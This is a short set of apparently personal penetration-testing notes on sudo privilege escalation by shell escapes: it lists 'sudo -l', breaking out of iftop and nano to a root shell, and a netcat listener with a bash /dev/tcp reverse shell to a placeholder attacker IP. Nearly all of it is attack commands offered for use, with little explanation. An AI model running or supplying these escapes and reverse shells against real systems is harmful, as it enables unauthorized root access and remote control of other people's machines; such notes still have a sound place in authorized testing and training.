shell escaping
start to know which process run with sudo privilege sudo -l

we will exploit all service
Iftop

sudo /usr/sbin/iftop
!/bin/sh

awk

may command line not suitable when as a root by nano service so let’s try to take a reverse shell
nano

sudo nano
ctrl+R
ctrl+x
reset; sh 1>&0 2>&0
which open a root shell but it’s blind which u can see the result only so let’s take a reverse shell on our machine
# attacker machine
nc -nlvp 5253
# victim
bash -i >& /dev/tcp/AttackerIP/5253 0>&1

Last updated